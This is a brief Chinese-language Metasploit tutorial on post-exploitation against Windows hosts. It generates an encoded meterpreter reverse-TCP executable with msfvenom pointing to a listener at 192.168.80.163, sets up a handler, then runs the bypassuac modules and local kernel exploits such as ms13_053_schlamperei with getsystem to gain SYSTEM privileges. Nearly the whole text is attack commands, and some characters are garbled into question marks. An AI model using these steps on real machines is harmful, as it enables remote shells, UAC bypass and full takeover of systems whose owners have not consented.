首先建立一個(gè)session，進(jìn)入后滲透測(cè)試階段。

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -b "\x00\xff" -i 7 -f exe -o /root/1.exe? 首先生成一個(gè)meterpreter類(lèi)型的payload

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.80.163

msf exploit(handler) > exploit

繞過(guò)UAC限制

exploit/windows/local/bypassuac 和 exploit/windows/local/bypassuac_injection

什么是UAC(用戶賬戶控制)？，例如：

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp

msf exploit(bypassuac) > set lhost 192.168.80.163

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

meterpreter > getsystem ?繞過(guò)UAC獲取system權(quán)限

利用windows系統(tǒng)漏洞提權(quán)到system

exploit/windows/local/ms13_053_schlamperei

exploit/windows/local/ms13_081_track_popup_menu

exploit/windows/local/ms13_097_ie_registry_symlink

exploit/windows/local/ppr_flatten_rec

msf > use exploit/windows/local/ms13_053_schlamperei

msf exploit(ms13_053_schlamperei) > set session 1

msf exploit(ms13_053_schlamperei) > set payload windows/meterpreter/reverse_tcp

msf exploit(ms13_053_schlamperei) > set lhost 192.168.80.163

msf exploit(ms13_053_schlamperei) > exploit

meterpreter > getsystem ?提權(quán)到system用戶